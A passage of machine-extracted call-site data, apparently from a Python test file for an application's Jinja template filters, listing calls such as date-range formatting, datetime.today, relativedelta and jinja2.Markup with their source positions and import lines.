format_address_list\n'), ((884, 20, 884, 97), 'app.jinja_filters.format_date_range_no_repeated_month_year', 'format_date_range_no_repeated_month_year', ({(884, 61, 884, 84): 'self.autoescape_context', (884, 86, 884, 96): '*case[0:3]'}, {}), '(self.autoescape_context, *case[0:3])', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((257, 29, 257, 45), 'datetime.datetime.today', 'datetime.today', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((257, 46, 257, 70), 'dateutil.relativedelta.relativedelta', 'relativedelta', (), '', False, 'from dateutil.relativedelta import relativedelta\n'), ((905, 54, 905, 63), 'jinja2.Markup', 'Markup', ({(905, 61, 905, 62): 'x'}, {}), '(x)', False, 'from jinja2 import Undefined, Markup\n')] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.